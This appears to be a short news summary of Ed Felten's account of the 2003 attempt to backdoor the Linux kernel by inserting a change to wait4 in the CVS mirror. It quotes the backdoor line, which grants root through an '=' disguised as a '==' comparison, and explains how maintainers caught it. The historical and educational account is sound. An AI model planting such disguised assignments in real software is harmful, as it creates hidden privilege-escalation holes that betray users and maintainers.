Ed Felton writes about an incident, in 2003, in which someone tried to backdoor the Linux kernel. Back in 2003 Linux used BitKeeper
to store the master copy of the Linux source code. If a developer
wanted to propose a modification to the Linux code, they would submit
their proposed change, and it would go through an organized approval
process to decide whether the change would be accepted into the master
code. But some people didn't like BitKeeper,
so a second copy of the source code was kept in CVS. On November 5,
2003, Larry McAvoy noticed that there was a code change in the CVS copy
that did not have a pointer to a record of approval. Investigation
showed that the change had never been approved and, stranger yet, that
this change did not appear in the primary BitKeeper repository at all.
Further investigation determined that someone had apparently broken in
electronically to the CVS server and inserted a small change to wait4: 'if ((options == (__WCLONE|__WALL)) && (current->uid = 0)) ...'
A casual reading makes it look like innocuous error-checking code, but
a careful reader would notice that, near the end of the first line, it
said '= 0' rather than '== 0' so the effect of this
code is to give root privileges to any piece of software that called
wait4 in a particular way that is supposed to be invalid. In other words
it's a classic backdoor. We don't know who it was that made the
attempt—and we probably never will. But the attempt didn't work, because
the Linux team was careful enough to notice that that this code was in
the CVS repository without having gone through the normal approval
process. 'Could this have been an NSA attack? Maybe. But there were many
others who had the skill and motivation to carry out this attack,'
writes Felton. 'Unless somebody confesses, or a smoking-gun document
turns up, we'll never know.
